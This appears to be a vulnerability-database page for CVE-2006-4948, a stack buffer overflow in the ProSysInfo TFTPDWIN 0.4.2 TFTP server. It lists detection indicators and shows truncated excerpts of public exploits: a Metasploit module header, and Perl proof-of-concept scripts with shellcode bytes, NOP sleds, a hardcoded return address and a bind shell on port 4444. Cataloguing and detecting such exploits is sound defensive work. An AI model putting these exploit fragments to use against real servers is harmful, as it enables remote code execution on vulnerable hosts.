CVE-2006-4948
published 2006-09-23CVE-2006-4948: Stack-based buffer overflow in tftpd.exe in ProSysInfo TFTP Server TFTPDWIN 0.4.2 and earlier allows remote attackers to execute arbitrary code or cause a…
PriorityP355high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
54.09%
98.9th percentile
Stack-based buffer overflow in tftpd.exe in ProSysInfo TFTP Server TFTPDWIN 0.4.2 and earlier allows remote attackers to execute arbitrary code or cause a denial of service via a long file name. NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| prosysinfo | tftp_server_tftpdwin | <= 0.4.2 | — |
| prosysinfo | tftp_server_tftpdwin | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x00\x02 + payload + ret + netascii\x00
bytes↗
\x00\x01 (TFTP RRQ opcode prefix in exploit packet)
- →Detect oversized UDP packets destined for port 69 (TFTP) — the exploit sends a long filename/payload that overflows the stack in tftpd.exe via a recv_from call. ↗
- →Alert on TFTP WRQ packets (opcode \x00\x02) to port 69/udp where the filename field is abnormally long (>284 bytes) and is followed by the mode string 'netascii'. ↗
- →Alert on TFTP RRQ packets (opcode \x00\x01) to port 69/udp containing NOP sleds (\x90 sequences) followed by shellcode — indicative of the Perl PoC exploit. ↗
- →Monitor for unexpected outbound TCP connections on port 4444 from the host running tftpd.exe, which would indicate successful bind-shell exploitation. ↗
- →The exploit payload space is 284 bytes with bad chars \x00; TFTP packets to port 69 with payload regions exceeding this size and lacking null bytes in the filename field are suspicious. ↗
- ·The Metasploit module targets only TFTPDWIN version 0.4.2; the return address (ROP gadget) is hardcoded to a specific offset within tftpd.exe and will not work against other versions. ↗
- ·The Metasploit module was tested on w2ksp0, w2ksp4, xpsp0, xpsp2 (English); reliability on other OS versions or locales is not guaranteed. ↗
- ·The exploit requires a StackAdjustment of -3500 bytes, meaning the payload must account for significant stack displacement; standard shellcode without this adjustment will fail. ↗
- ·The universal PoC (exploit 7452) restricts shellcode to avoid bytes 0x00, 0x6e, 0x65, 0x74 — any detection or payload generation must account for these bad characters. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-hx28-643q-3cjf: Stack-based buffer overflow in tftpd
ghsa_unreviewed·2022-05-01
CVE-2006-4948 [HIGH] GHSA-hx28-643q-3cjf: Stack-based buffer overflow in tftpd
Stack-based buffer overflow in tftpd.exe in ProSysInfo TFTP Server TFTPDWIN 0.4.2 and earlier allows remote attackers to execute arbitrary code or cause a denial of service via a long file name. NOTE: the provenance of this information is unknown; the details are obtained from third party information.
GHSA
GHSA-m958-mf4w-j778: tftpd
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2007-1404 [HIGH] GHSA-m958-mf4w-j778: tftpd
tftpd.exe in ProSysInfo TFTP Server TFTPDWIN 0.4.2 allows remote attackers to cause a denial of service via a long UDP packet that is not properly handled in a recv_from call. NOTE: this issue might be related to CVE-2006-4948.
No detection rules found.
Exploit-DB
ProSysInfo TFTP server TFTPDWIN 0.4.2 - 'Filename' Remote Buffer Overflow (Metasploit)
exploitdb·2010-04-30
CVE-2006-4948 ProSysInfo TFTP server TFTPDWIN 0.4.2 - 'Filename' Remote Buffer Overflow (Metasploit)
ProSysInfo TFTP server TFTPDWIN 0.4.2 - 'Filename' Remote Buffer Overflow (Metasploit)
---
##
# $Id: tftpdwin_long_filename.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'TFTPDWIN v0.4.2 Long Filename Buffer Overflow',
'Description' => %q{
This module exploits the ProSysInfo TFTPDWIN threaded TFTP Server. By sending
an overly long file name to the tftpd.exe server, the stack can be overwritten.
},
'Author' => [ 'patrick' ],
'Version' => '$Revision: 9179 $',
'References' =>
[
[ 'CVE', '2006-4948' ],
[ 'O
Exploit-DB
ProSysInfo TFTP server TFTPDWIN 0.4.2 - Universal Remote Buffer Overflow
exploitdb·2008-12-14
CVE-2006-4948 ProSysInfo TFTP server TFTPDWIN 0.4.2 - Universal Remote Buffer Overflow
ProSysInfo TFTP server TFTPDWIN 0.4.2 - Universal Remote Buffer Overflow
---
#!/usr/bin/perl
#
# ProSysInfo TFTP server TFTPDWIN
#
# Greets fly to InTeL.
#
# WARNING: Author has no responsibility over the damage
# you do using this!
use IO::Socket;
use warnings;
use strict;
if(!($ARGV[0]))
{
print "[x] ProSysInfo TFTP server TFTPDWIN \n\n";
exit(0);
}
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=Pex http://metasploit.com
# Restricted chars = 0x00 0x6e 0x65 0x74
my $shellcode =
"\x29\xc9\x83\xe9\xde\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xaf".
"\x4f\xb9\xec\x83\xee\xfc\xe2\xf4\x53\xa7\xfd\xec\xaf\x4f\x32\xa9".
"\x93\xc4\xc5\xe9\xd7\x4e\x56\x67\xe0\x57\x32\xb3\x8f\x4e\x52\xa5".
"\x24\x7b\x32\xed\x41\x7e\x79\x75\x03\xcb\x79\x98\xa8\x8e\x73\xe1".
"\xae\x8d\x52\x18\x94\x1b\x9d\x
Exploit-DB
ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow (1)
exploitdb·2007-01-15
CVE-2006-4948 ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow (1)
ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow (1)
---
#!/usr/bin/perl -w
use IO::Socket;
if(!($ARGV[1]))
{
print "Usage: tftpdwin-0-4-2.pl \n\n";
exit;
}
$victim = IO::Socket::INET->new(Proto=>'udp',
PeerAddr=>$ARGV[0],
PeerPort=>$ARGV[1])
or die "Cannot connect to $ARGV[0] sulla porta $ARGV[1]";
my $nop0="\x90"x15;
#8BC3 MOV EAX,EBX
#66:05 1201 ADD AX,112
#50 PUSH EAX
#C3 RETN
my $asm="\x8b\xc3\x66\x05\x12\x01\x50\xc3";
my $nop="\x90"x57;
my $nop1="\x90"x7;
my $eip="\x42\xfb\x61\x40";# pop ebp,ret in tftpd.exe
#my $eip="B"x4;
#A binary translation of NGS Writing Small Shellcode by Dafydd Stuttard with only two little differences
#1)bind port, in this exploit is 4444 in the original shellcode was 6666
#2)4 bytes added to the shellcode in order not to see the win
Metasploit
TFTPDWIN v0.4.2 Long Filename Buffer Overflow
metasploit
TFTPDWIN v0.4.2 Long Filename Buffer Overflow
TFTPDWIN v0.4.2 Long Filename Buffer Overflow
This module exploits the ProSysInfo TFTPDWIN threaded TFTP Server. By sending an overly long file name to the tftpd.exe server, the stack can be overwritten.
No writeups or analysis indexed.
http://secunia.com/advisories/21854http://www.osvdb.org/29032http://www.securityfocus.com/bid/20131http://www.vupen.com/english/advisories/2006/3731https://exchange.xforce.ibmcloud.com/vulnerabilities/29075http://secunia.com/advisories/21854http://www.osvdb.org/29032http://www.securityfocus.com/bid/20131http://www.vupen.com/english/advisories/2006/3731https://exchange.xforce.ibmcloud.com/vulnerabilities/29075
2006-09-23
Published